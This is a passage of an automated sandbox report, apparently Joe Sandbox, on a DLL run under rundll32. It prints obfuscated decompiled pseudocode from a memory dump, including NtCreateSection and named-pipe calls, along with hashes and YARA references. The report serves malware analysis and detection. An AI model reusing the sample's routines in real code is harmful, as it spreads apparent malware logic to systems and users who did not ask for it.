				 *(_t729 +  *(__rdx + 0x608) * 4) =  *(_t729 +  *(__rdx + 0x608) * 4) ^ _t436;
				_t437 = _t436 & r14d;
				if (_t459 >= 0) goto 0x535f7efe;
				_t691 =  *((intOrPtr*)(__rdx + 0x430));
				r8d =  *(_t691 +  *(__rdx + 0x608) * 4);
				if (( *((intOrPtr*)(__rdx + 0x61c)) - 1 | 0xffffffe0) + 1 == 0) goto 0x535f7f17;
				asm("inc ecx");
				r10d = r10d + _t431;
				 *((intOrPtr*)(_t691 +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)(_t691 +  *(__rdx + 0x60c) * 4)) + r8d;
				_t625 =  *((intOrPtr*)(__rdx + 0x108));
				 *(__rdx + 0x128) =  *(__rdx + 0x128) ^  *_t625;
				 *_t625 =  *_t625 + 1;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x240)) + 0x140)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x240)) + 0x140)) +  *((intOrPtr*)(__rdx + 0x108)) - 0xffffff80;
				asm("cdq");
				 *(__rdx + 0x608) = _t691;
				asm("cdq");
				 *(__rdx + 0x60c) = _t691;
				 *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x230) =  *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x230) * ( *( *((intOrPtr*)(__rdx + 0x240)) + 0xc8) ^ _t747);
				_t461 = r10d -  *((intOrPtr*)(__rdx + 0x604));
				if (_t461 < 0) goto 0x535f7ecf;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) - ( *( *((intOrPtr*)(__rdx + 0x108)) + 0x170) ^ _t744);
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) + _t437;
				_t438 = _t437 & r14d;
				if (_t461 >= 0) goto 0x535f8005;
				_t517 =  *((intOrPtr*)(__rdx + 0x430));
				if (( *((intOrPtr*)(__rdx + 0x618)) - 1 | 0xffffffe0) + 1 == 0) goto 0x535f8020;
				r8d =  *(_t517 +  *(__rdx + 0x608) * 4);
				asm("inc ecx");
				goto 0x535f802b;
				r8d =  *(_t517 +  *(__rdx + 0x608) * 4);
				r9d = r9d + _t431;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) + r8d;
				if (r9d -  *((intOrPtr*)(__rdx + 0x600)) < 0) goto 0x535f7e8b;
				_t519 =  *((intOrPtr*)(__rdx + 0x160));
				 *0x8168488A89001AF4 =  *0x8168488A89001AF4 << 0x8f;
				_t419 = _t519;
				 *_t519 =  *_t519 + _t419;
				 *((intOrPtr*)(_t519 - 0x75)) =  *((intOrPtr*)(_t519 - 0x75)) + _t438;
				_t271 = _t519 + 3;
				 *_t271 = 1;
				 *_t519 =  *_t519 + _t419;
				 *(_t519 + 0x1a8) =  *(_t519 + 0x1a8) | _t744;
				_t521 =  *((intOrPtr*)(__rdx + 0x110)) + 0x238;
				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) + _t521;
				 *((intOrPtr*)(_t521 + 5)) =  *((intOrPtr*)(_t521 + 5)) + _t438;
				asm("adc [eax-0x76b7ffec], bl");
				_t281 = _t521 - 0x17ffffff;
				_t710 =  *_t281;
				 *_t281 = __rdx;
				asm("jmp dword 0x4789:0x48fffea1");
				_t522 =  *0x8948fffe;
				_push(_t522);
				asm("push es");
				 *_t522 =  *_t522 + _t419 +  *_t521;
				 *( *((intOrPtr*)(_t710 + 0x110)) + 0x330) =  *( *((intOrPtr*)(_t710 + 0x20)) + 0x108) * 0x1ba7;
				 *( *((intOrPtr*)(_t710 + 0x358)) + 0x250) =  *( *((intOrPtr*)(_t710 + 0x358)) + 0x250) |  *(_t710 + 0x240) + 0x00000300;
				 *((long long*)(_t710 + 0x45c)) =  *((intOrPtr*)( *((intOrPtr*)(_t710 + 0x20)) + 0x68));
				 *( *((intOrPtr*)(_t710 + 0x2a0)) + 0x130) =  *( *((intOrPtr*)(_t710 + 0x2a0)) + 0x130) |  *( *((intOrPtr*)(_t710 + 0x358)) + 0x4b8);
				 *( *((intOrPtr*)(_t710 + 0x358)) + 0x4b8) =  *( *((intOrPtr*)(_t710 + 0x358)) + 0x4b8) +  *_t271;
				 *((long long*)( *(_t710 + 0x240) + 0x3c0)) =  *( *(_t710 + 0x240)) + 0x157a;
				_t532 =  *((intOrPtr*)(_t710 + 0x45c));
				 *(_t710 + 0x1b8) = _t532;
				goto 0x535f84d3;
				_t533 = _t532 * _t713;
				_t423 = _t533;
				if ( *((intOrPtr*)(_t710 + 0x440)) - _t533 >= 0) goto 0x535f84c9;
				r13d = 0x1582;
				_t647 = _t414 /  *(__rdx + 0x458) /  *(__rdx + 0x458) /  *(__rdx + 0x458) %  *(__rdx + 0x458);
				 *(_t724 + 0x58) = _t647;
				if (_t647 - ( *(_t710 + 0x1a8) ^  *(_t710 + 0x478) ^  *(_t710 + 0x28)) <= 0) goto 0x535f841a;
				 *((long long*)(_t724 + 0x60)) = _t449;
				 *(_t710 + 0x2a8) =  *(_t710 + 0xb0) ^ 0x000011f1;
				r14d = r14d + _t438 - r13d;
				 *((intOrPtr*)(_t710 + 0x448)) =  *((intOrPtr*)(_t710 + 0x448)) + ( *(_t710 + 0x1c0) ^ 0x00001fda);
				r14d = r14d * _t423;
				_t584 = r9d;
				r8d = r8d * _t423;
				 *(_t724 + 0x28) =  *((intOrPtr*)(_t710 + 0x138)) -  *(_t710 + 0x70) &  *(_t710 + 0x2c8);
				 *(_t724 + 0xe8) = r8d;
				r8d = r8d | r12d;
				r8d = r8d -  *(_t710 + 0x410);
				 *(_t724 + 0x20) = ( *(_t710 + 0x90) ^ _t584) *  *(_t710 + 0xd0);
				InitializeCriticalSection(??);
				_t655 =  *(_t724 + 0xc0);
				r9d =  *(_t710 + 0x108);
				r8d =  *(_t710 + 0xb0);
				 *(_t724 + 0xe8) =  *(_t724 + 0xe8) ^  *((intOrPtr*)(_t710 + 0x450)) + 0x00001320;
				 *(_t710 + 0x250) =  *(_t710 + 0x250) ^ ( *(_t710 + 0x108) | _t584);
				 *((intOrPtr*)(_t710 + 0x110)) =  *((intOrPtr*)(_t710 + 0x110)) - (_t655 |  *(_t710 + 0x340));
				_t702 =  *(_t724 + 0xb0) - ( *(_t710 + 0x480) |  *(_t724 + 0xb0));
				_t560 =  *((intOrPtr*)(_t710 + 0x300)) +  *((intOrPtr*)(_t710 + 0x418));
				 *(_t710 + 0x240) =  *(_t710 + 0x240) + _t560;
				 *(_t724 + 0xb0) = _t702;
				 *(_t724 + 0xc0) = _t655 ^ _t560 ^ _t702;
				 *(_t710 + 0x360) =  *(_t710 + 0x360) |  *((intOrPtr*)(_t710 + 0x2f8)) -  *((intOrPtr*)(_t724 + 0x60)) - 0x00001b47;
				r8d = r8d &  *(_t710 + 0x240);
				r11d =  *(_t710 + 0x188);
				r8d = r8d | _t431;
				r11d = r11d -  *(_t710 + 0x478);
				r10d =  *(_t710 + 0x70);
				r10d = r10d *  *(_t724 + 0xb0);
				_t565 =  *((intOrPtr*)(_t710 + 0x2e0));
				r11d = r11d * r9d;
				r9d =  *(_t710 + 0xd0);
				r9d = r9d ^  *(_t724 + 0xc0);
				 *(_t724 + 0x40) = 0x1fda;
				r9d = r9d ^ 0x00001320;
				 *(_t724 + 0x38) = _t565;
				 *(_t724 + 0x30) = r9d;
				 *(_t724 + 0x28) = r10d;
				 *(_t724 + 0x20) = r11d;
				r9d = E00007FFA7FFA535F6E94(_t565,  *(_t724 + 0xd0),  *(_t710 + 0x2a8) ^  *(_t724 + 0xd0) | _t702,  *((intOrPtr*)(_t710 + 0x48)) + _t713 - ( *(_t710 + 0x108) | _t584 | 0x00001515) &  *(_t724 + 0xd0), __rdx, _t710,  *((intOrPtr*)(_t710 + 0x138)) -  *(_t710 + 0x70) &  *(_t710 + 0x2c8));
				r8d =  *(_t724 + 0xe8);
				 *(_t724 + 0xb0) = _t565;
				 *(_t710 + 0x230) =  *(_t710 + 0x230) * ( *((intOrPtr*)(_t710 + 0x178)) +  *(_t724 + 0x58));
				_t440 = r15d;
				r8d = r8d ^ _t440;
				r14d = r14d | _t440;
				if (_t449 - ( *(_t710 + 0x1a8) ^  *(_t710 + 0x478) ^  *(_t710 + 0x28)) > 0) goto 0x535f81a3;
				r14d = r14d &  *(_t724 + 0xc0);
				r14d = r14d & 0x00000bbb;
				 *((intOrPtr*)(_t710 + 0x298)) =  *((intOrPtr*)(_t710 + 0x298)) - ( *(_t710 + 0x128) & r15d) *  *(_t710 + 0x1b0);
				 *(_t710 + 0x248) =  *(_t710 + 0x248) -  *(_t710 + 0x410) *  *(_t724 + 0x58);
				_t430 = ConnectNamedPipe(??, ??);
				 *(_t710 + 0x4b8) =  *(_t710 + 0x4b8) | ( *(_t710 + 0x470) ^  *(_t710 + 0x140)) * 0x00001355;
				 *((intOrPtr*)(_t710 + 0x320)) =  *((intOrPtr*)(_t710 + 0x320)) + ( *(_t710 + 0xa0) & r12d);
				 *((intOrPtr*)(_t710 + 0x168)) =  *((intOrPtr*)(_t710 + 0x168)) - ((_t447 |  *(_t710 + 0x248)) &  *(_t710 + 0x70));
				goto 0x535f84d3;
				r12d = r12d | 0x00001ad7;
				return _t430;
			}
























































                0x7ffa535f7a40
                0x7ffa535f7a40
                0x7ffa535f7a40
                0x7ffa535f7a45
                0x7ffa535f7a50
                0x7ffa535f7a54
                0x7ffa535f7a63
                0x7ffa535f7a6b
                0x7ffa535f7a6b
                0x7ffa535f7a79
                0x7ffa535f7a80
                0x7ffa535f7a87
                0x7ffa535f7a8e
                0x7ffa535f7a95
                0x7ffa535f7a9d
                0x7ffa535f7aa0
                0x7ffa535f7aa7
                0x7ffa535f7ab5
                0x7ffa535f7abc
                0x7ffa535f7abc
                0x7ffa535f7ac2
                0x7ffa535f7ac5
                0x7ffa535f7acd
                0x7ffa535f7ada
                0x7ffa535f7aee
                0x7ffa535f7af2
                0x7ffa535f7af9
                0x7ffa535f7b05
                0x7ffa535f7b10
                0x7ffa535f7b15
                0x7ffa535f7b15
                0x7ffa535f7b1c
                0x7ffa535f7b20
                0x7ffa535f7b27
                0x7ffa535f7b2b
                0x7ffa535f7b30
                0x7ffa535f7b43
                0x7ffa535f7b4a
                0x7ffa535f7b50
                0x7ffa535f7b67
                0x7ffa535f7b82
                0x7ffa535f7b99
                0x7ffa535f7ba2
                0x7ffa535f7baf
                0x7ffa535f7bb5
                0x7ffa535f7bd8
                0x7ffa535f7bdf
                0x7ffa535f7be7
                0x7ffa535f7bed
                0x7ffa535f7c01
                0x7ffa535f7c08
                0x7ffa535f7c24
                0x7ffa535f7c2b
                0x7ffa535f7c40
                0x7ffa535f7c44
                0x7ffa535f7c51
                0x7ffa535f7c5a
                0x7ffa535f7c68
                0x7ffa535f7c6e
                0x7ffa535f7c70
                0x7ffa535f7c7a
                0x7ffa535f7c7d
                0x7ffa535f7c88
                0x7ffa535f7c96
                0x7ffa535f7ca4
                0x7ffa535f7cb6
                0x7ffa535f7cc4
                0x7ffa535f7cd4
                0x7ffa535f7cd8
                0x7ffa535f7cdf
                0x7ffa535f7cec
                0x7ffa535f7cfa
                0x7ffa535f7d09
                0x7ffa535f7d10
                0x7ffa535f7d2b
                0x7ffa535f7d39
                0x7ffa535f7d40
                0x7ffa535f7d47
                0x7ffa535f7d6c
                0x7ffa535f7d79
                0x7ffa535f7d82
                0x7ffa535f7d8b
                0x7ffa535f7d94
                0x7ffa535f7d98
                0x7ffa535f7d9b
                0x7ffa535f7da4
                0x7ffa535f7daf
                0x7ffa535f7db9
                0x7ffa535f7dc4
                0x7ffa535f7dca
                0x7ffa535f7dd4
                0x7ffa535f7dd7
                0x7ffa535f7de1
                0x7ffa535f7de7
                0x7ffa535f7df1
                0x7ffa535f7dfb
                0x7ffa535f7e05
                0x7ffa535f7e0f
                0x7ffa535f7e20
                0x7ffa535f7e3f
                0x7ffa535f7e49
                0x7ffa535f7e60
                0x7ffa535f7e78
                0x7ffa535f7e85
                0x7ffa535f7e92
                0x7ffa535f7e95
                0x7ffa535f7ebc
                0x7ffa535f7ec3
                0x7ffa535f7ec9
                0x7ffa535f7ecf
                0x7ffa535f7ee4
                0x7ffa535f7ee8
                0x7ffa535f7ef2
                0x7ffa535f7ef5
                0x7ffa535f7efe
                0x7ffa535f7f0c
                0x7ffa535f7f12
                0x7ffa535f7f14
                0x7ffa535f7f1e
                0x7ffa535f7f21
                0x7ffa535f7f25
                0x7ffa535f7f2f
                0x7ffa535f7f36
                0x7ffa535f7f4b
                0x7ffa535f7f60
                0x7ffa535f7f69
                0x7ffa535f7f71
                0x7ffa535f7f74
                0x7ffa535f7f9d
                0x7ffa535f7fa4
                0x7ffa535f7fab
                0x7ffa535f7fc9
                0x7ffa535f7fef
                0x7ffa535f7ff9
                0x7ffa535f7ffc
                0x7ffa535f8005
                0x7ffa535f800e
                0x7ffa535f8017
                0x7ffa535f801b
                0x7ffa535f801e
                0x7ffa535f8027
                0x7ffa535f8032
                0x7ffa535f803c
                0x7ffa535f8047
                0x7ffa535f804d
                0x7ffa535f8060
                0x7ffa535f8067
                0x7ffa535f8068
                0x7ffa535f806a
                0x7ffa535f806d
                0x7ffa535f806d
                0x7ffa535f8070
                0x7ffa535f8072
                0x7ffa535f8087
                0x7ffa535f808d
                0x7ffa535f809f
                0x7ffa535f80a2
                0x7ffa535f80a8
                0x7ffa535f80a8
                0x7ffa535f80a8
                0x7ffa535f80ae
                0x7ffa535f80af
                0x7ffa535f80b8
                0x7ffa535f80b9
                0x7ffa535f80ba
                0x7ffa535f80d2
                0x7ffa535f80ed
                0x7ffa535f80fe
                0x7ffa535f8119
                0x7ffa535f8127
                0x7ffa535f813e
                0x7ffa535f8145
                0x7ffa535f814c
                0x7ffa535f8153
                0x7ffa535f815b
                0x7ffa535f8161
                0x7ffa535f816a
                0x7ffa535f8177
                0x7ffa535f8188
                0x7ffa535f818b
                0x7ffa535f8193
                0x7ffa535f819e
                0x7ffa535f81e5
                0x7ffa535f81ec
                0x7ffa535f8203
                0x7ffa535f821d
                0x7ffa535f822c
                0x7ffa535f8242
                0x7ffa535f8257
                0x7ffa535f8264
                0x7ffa535f826c
                0x7ffa535f826f
                0x7ffa535f8276
                0x7ffa535f827b
                0x7ffa535f8281
                0x7ffa535f8296
                0x7ffa535f82a0
                0x7ffa535f82ac
                0x7ffa535f82c4
                0x7ffa535f82df
                0x7ffa535f82f1
                0x7ffa535f82fa
                0x7ffa535f8301
                0x7ffa535f830d
                0x7ffa535f8322
                0x7ffa535f8335
                0x7ffa535f8347
                0x7ffa535f834e
                0x7ffa535f8355
                0x7ffa535f8358
                0x7ffa535f835f
                0x7ffa535f8363
                0x7ffa535f836c
                0x7ffa535f8372
                0x7ffa535f8379
                0x7ffa535f8380
                0x7ffa535f8388
                0x7ffa535f8390
                0x7ffa535f8397
                0x7ffa535f839b
                0x7ffa535f83a3
                0x7ffa535f83a8
                0x7ffa535f83c3
                0x7ffa535f83cb
                0x7ffa535f83d7
                0x7ffa535f83de
                0x7ffa535f83e5
                0x7ffa535f83ed
                0x7ffa535f83f8
                0x7ffa535f8410
                0x7ffa535f8438
                0x7ffa535f8443
                0x7ffa535f8465
                0x7ffa535f846e
                0x7ffa535f847c
                0x7ffa535f849e
                0x7ffa535f84b9
                0x7ffa535f84c0
                0x7ffa535f84c7
                0x7ffa535f84c9
                0x7ffa535f84ec

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ConnectCriticalInitializeNamedPipeSection
                • String ID:
                • API String ID: 3855124782-0
                • Opcode ID: ff7cc1d0ecebee6b7c2c6f8861cf9849c3244afc2679fe94427b985759abdd2b
                • Instruction ID: 85e14e36f0efd5a3e8e60e5816fedd36d61ac4f084f8fce2450afecb0f743bfa
                • Opcode Fuzzy Hash: ff7cc1d0ecebee6b7c2c6f8861cf9849c3244afc2679fe94427b985759abdd2b
                • Instruction Fuzzy Hash: 685200B2315A84ABDB5CCF29D6947A9B7A5F788B84F04512ACB6E43750CF35E1B0CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F615C Relevance: 3.2, APIs: 2, Instructions: 199nativepipeCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 37%
                			E00007FFA7FFA535F615C(void* __rax, long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r9) {
				void* __rsi;
				void* __rbp;
				void* _t121;
				void* _t129;
				signed short _t130;
				signed short _t136;
				signed long long _t138;
				signed int _t153;
				void* _t165;
				long long _t173;
				signed long long _t187;
				long long _t189;
				signed long long _t208;
				long _t222;
				void* _t227;
				signed long long _t232;
				void* _t235;
				void* _t236;
				long long* _t241;
				struct _GUID _t242;
				long long _t243;
				struct _EXCEPTION_RECORD _t245;
				long _t247;
				HANDLE* _t249;

				 *((long long*)(_t235 + 0x10)) = __rbx;
				_t236 = _t235 - 0x90;
				_t153 =  *(_t236 + 0x108);
				r11d = __r8 - 0x9c7;
				r10d =  *(_t236 + 0xf8);
				_t232 =  *(_t236 + 0x110) + 0xffffee0f;
				_t243 = __rdx;
				 *(_t236 + 0xe8) = _t232;
				 *(_t236 + 0xf8) = r11d;
				r9d =  *(_t236 + 0xf0);
				r14d = _t153 - 0x2dd;
				 *(_t236 + 0xd0) = __rdx;
				 *(_t236 + 0x110) = r14d;
				r10d = r10d + 0xfffffed1;
				 *(_t236 + 0x108) = _t153 + 0xd1;
				 *(_t236 + 0x80) = _t222;
				 *(_t236 + 0xe0) = _t227;
				r9d = __r8 - 0x1582;
				 *(_t236 + 0xf0) = r9d;
				if (_t222 == _t232 + 0x2114) goto 0x535f654b;
				if (r9d - _t121 >= 0) goto 0x535f6323;
				_t241 = __rdx + 0x620;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) & 0x00000000;
				 *((long long*)(__rdx + 0x128)) = 0x19f;
				_t187 = __rcx - 0x89a + 0x9c9;
				 *(_t236 + 0x28) = 0x8000000;
				 *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x140) =  *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x140) |  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x3b8)) + 0x00001ec0;
				 *(__rdx + 0x38c) =  *(__rdx + 0x38c) & 0x00000000;
				 *((intOrPtr*)(__rdx + 0x388)) =  *((intOrPtr*)(__rdx + 0x348));
				 *((long long*)(__rdx + 0xf8)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0xb8)) + 0x3c)) +  *((intOrPtr*)(__rdx + 0xb8));
				 *((long long*)(__rdx + 0x3b0)) =  *((intOrPtr*)(__rdx + 0x288));
				 *_t241 =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x70)) - 0x1487;
				 *((long long*)( *((intOrPtr*)(__rdx + 0x20)) + 0x3a0)) =  *((long long*)( *((intOrPtr*)(__rdx + 0x20)) + 0x3a0)) + 0xca2;
				r8d =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x1b0);
				r8d = r8d - 0x1f9a;
				 *(_t236 + 0x20) = r8d;
				r8d = 0;
				 *((intOrPtr*)(__rdx + 0x404)) = NtCreateSection(_t249, _t247, _t245, _t242, _t222);
				goto 0x535f650b;
				_t165 = __r9 - 0x157a -  *((intOrPtr*)(__rdx + 0x368));
				if ( *((intOrPtr*)(__rdx + 0x2a8)) != _t165) goto 0x535f650b;
				if (( *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x148) ^ 0x0000135b) - _t165 - _t241 + _t187 > 0) goto 0x535f637b;
				_t136 =  *(__rdx + 0x438) & 0x0000ffff ^  *(_t236 + 0xd0) ^ _t130;
				DisconnectNamedPipe(_t227);
				r9d =  *(_t236 + 0xf0);
				r11d =  *(_t236 + 0xf8);
				if ( *((intOrPtr*)(__rdx + 0x188)) != ( *((intOrPtr*)(__rdx + 0x1d0)) + __r9 + 0x154) * 0x1320) goto 0x535f650b;
				r13d =  *((intOrPtr*)(__rdx + 0x230));
				r11d = r11d & 0x00001582;
				r8d =  *(__rdx + 0x248);
				r10d =  *(__rdx + 0x3b8);
				_t138 =  *((intOrPtr*)(__rdx + 0x2a8));
				r8d = r8d | r14d;
				r10d = r10d - 0x1ad7;
				r15d =  *(__rdx + 0x28);
				r15d = r15d & r9d;
				r13d = r13d -  *((intOrPtr*)(__rdx + 0xa0));
				r13d = r13d + _t136;
				r8d = r8d ^ 0x00000651;
				r14d = ( *(__rdx + 0x318) ^  *(__rdx + 0x240)) * 0x11f1;
				 *(_t236 + 0xf8) = r11d;
				r11d = r9d;
				r9d = r9d *  *(_t236 + 0x110);
				r11d = r11d & 0x00002114;
				 *((long long*)(_t236 + 0x78)) =  *(_t236 + 0x110) *  *(_t236 + 0xd0) + 0x1320;
				_t173 =  *(_t236 + 0xf8);
				 *(_t236 + 0x70) = r10d;
				 *(_t236 + 0x68) = _t187 ^  *(_t236 + 0xe0);
				 *((long long*)(_t236 + 0x60)) = _t173;
				 *(_t236 + 0x58) = _t222 + 0x00000932 & 0x000012ad;
				 *((long long*)(_t236 + 0x50)) = _t227 - 0x651;
				 *((long long*)(_t236 + 0x48)) = __rdx;
				 *(_t236 + 0x40) = _t232 &  *(_t236 + 0x108);
				 *((intOrPtr*)(_t236 + 0x38)) = r13d;
				 *(_t236 + 0xf0) = r9d;
				r9d = _t136;
				 *(_t236 + 0x30) = r14d;
				 *(_t236 + 0x28) = r15d;
				 *(_t236 + 0x20) = r11d;
				E00007FFA7FFA535F9404(_t187 ^  *(_t236 + 0xe0),  *((intOrPtr*)(__rdx + 0x1d0)) + __r9 + 0x154,  *(_t236 + 0xf0), _t227 - 0x651, _t232 &  *(_t236 + 0x108), __r8, _t241);
				_t189 = _t173;
				 *(_t243 + 0x2a0) =  *(_t243 + 0x2a0) * (( *(_t243 + 0x58) &  *(_t236 + 0xe8)) + 0x651);
				 *(_t243 + 0x2d0) =  *(_t243 + 0x5d8) ^ 0x00000bbb;
				_t102 = _t189 - 0x1625; // -5669
				if ( *(_t236 + 0x80) - _t102 < 0) goto 0x535f65b2;
				if ( *((intOrPtr*)(_t243 + 0x404)) == 0) goto 0x535f65b2;
				 *( *((intOrPtr*)(_t243 + 0x358)) + 0x5e0) =  *( *((intOrPtr*)(_t243 + 0x20)) + 0x390) * 0x1ad7;
				goto 0x535f65b8;
				_t208 = _t138;
				if ( *((intOrPtr*)(_t243 + 0x2f8)) - ( *(_t243 + 0x128) ^ _t208) + 0x145c <= 0) goto 0x535f65b2;
				if ( *((intOrPtr*)(_t243 + 0x110)) - ( *(_t243 + 0x2a0) | _t208) <= 0) goto 0x535f65b2;
				_t129 = _t241 + 0x1582;
				 *(_t243 + 0x3b8) =  *(_t243 + 0x3b8) ^ _t129 +  *((intOrPtr*)(_t243 + 0x298));
				 *(_t243 + 0xa0) =  *(_t243 + 0xa0) |  *(_t243 + 0x2a8) * 0x000011f1 ^ r11d;
				return _t129;
			}



























                0x7ffa535f615c
                0x7ffa535f616c
                0x7ffa535f6173
                0x7ffa535f6187
                0x7ffa535f618e
                0x7ffa535f6196
                0x7ffa535f619c
                0x7ffa535f619f
                0x7ffa535f61ad
                0x7ffa535f61b5
                0x7ffa535f61bd
                0x7ffa535f61ca
                0x7ffa535f61d7
                0x7ffa535f61df
                0x7ffa535f61e6
                0x7ffa535f61f4
                0x7ffa535f6202
                0x7ffa535f6209
                0x7ffa535f6210
                0x7ffa535f621a
                0x7ffa535f6229
                0x7ffa535f6237
                0x7ffa535f623f
                0x7ffa535f624d
                0x7ffa535f6259
                0x7ffa535f625f
                0x7ffa535f6274
                0x7ffa535f6287
                0x7ffa535f629b
                0x7ffa535f62a6
                0x7ffa535f62c1
                0x7ffa535f62ce
                0x7ffa535f62d4
                0x7ffa535f62e4
                0x7ffa535f62f3
                0x7ffa535f62fa
                0x7ffa535f62ff
                0x7ffa535f6316
                0x7ffa535f631e
                0x7ffa535f6326
                0x7ffa535f6336
                0x7ffa535f6345
                0x7ffa535f6358
                0x7ffa535f635e
                0x7ffa535f636b
                0x7ffa535f6373
                0x7ffa535f6398
                0x7ffa535f639e
                0x7ffa535f63a6
                0x7ffa535f63bd
                0x7ffa535f63c5
                0x7ffa535f63d4
                0x7ffa535f63dc
                0x7ffa535f63e7
                0x7ffa535f63ee
                0x7ffa535f6401
                0x7ffa535f640f
                0x7ffa535f6424
                0x7ffa535f642e
                0x7ffa535f6435
                0x7ffa535f644c
                0x7ffa535f6454
                0x7ffa535f6457
                0x7ffa535f6460
                0x7ffa535f646c
                0x7ffa535f6470
                0x7ffa535f6477
                0x7ffa535f647c
                0x7ffa535f6480
                0x7ffa535f6484
                0x7ffa535f6488
                0x7ffa535f648c
                0x7ffa535f6491
                0x7ffa535f6495
                0x7ffa535f649a
                0x7ffa535f64a2
                0x7ffa535f64ac
                0x7ffa535f64b1
                0x7ffa535f64b6
                0x7ffa535f64bb
                0x7ffa535f64c8
                0x7ffa535f64ec
                0x7ffa535f6503
                0x7ffa535f650b
                0x7ffa535f6513
                0x7ffa535f6522
                0x7ffa535f6540
                0x7ffa535f6549
                0x7ffa535f6553
                0x7ffa535f6567
                0x7ffa535f657c
                0x7ffa535f657e
                0x7ffa535f6590
                0x7ffa535f65aa
                0x7ffa535f65d2

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CreateDisconnectNamedPipeSection
                • String ID:
                • API String ID: 4281913487-0
                • Opcode ID: 17d992a7432668e4eb444aa07ec58e46677ea7302fb7bbe7f68e0d605f58bee4
                • Instruction ID: 47890ce1e09b5a669ff8df59b86377a81bb2d4d389a92553468a53c5b71d6706
                • Opcode Fuzzy Hash: 17d992a7432668e4eb444aa07ec58e46677ea7302fb7bbe7f68e0d605f58bee4
                • Instruction Fuzzy Hash: 7AB16273614AD58AD764CF14E088FEE77A9F388788F024126DB8A57B54EB38D598CB04
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535FB5B0 Relevance: 3.1, APIs: 2, Instructions: 122nativethreadCOMMON
                Download Yara Rule
                C-Code - Quality: 28%
                			E00007FFA7FFA535FB5B0(void* __edx, void* __eflags, long long __rbx, signed int __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, signed int __r9, void* _a8, void* _a16, void* _a24, long long _a40, long long _a48, long long _a56) {
				long long _v40;
				long long _v48;
				long long _v56;
				void* _t102;
				void* _t107;
				void* _t108;
				signed long long* _t119;
				long long _t124;
				signed long long _t130;
				void* _t131;
				intOrPtr _t145;
				signed long long _t156;
				signed int _t172;
				HANDLE* _t175;
				intOrPtr* _t176;
				long long _t179;
				signed int _t183;
				void* _t185;
				void* _t195;
				void* _t196;
				void* _t199;

				_t195 = _t185;
				 *((long long*)(_t195 + 8)) = __rbx;
				 *((long long*)(_t195 + 0x10)) = __rbp;
				 *((long long*)(_t195 + 0x18)) = __rsi;
				_t145 =  *0x5367c000; // 0x2151e49def0
				_t183 = __r9;
				r15d = __edx;
				_t176 = __rcx;
				 *_t119 =  *_t119 | 0x00000004;
				 *_t119 =  *_t119 + _t102;
				 *((intOrPtr*)(__r9 + __rcx * 4 - 0x7d)) =  *((intOrPtr*)(__r9 + __rcx * 4 - 0x7d)) + _t108;
				 *((long long*)(_t119 - 0x75)) =  *((long long*)(_t119 - 0x75)) - 1;
				_t119[0x9000000] = _t119[0x9000000] | 0xffffff89;
				_t119[0x9000000] = _t119[0x9000000] ^ 0xffffff8b;
				_t119[0] = _t119[0] & 0x00000000;
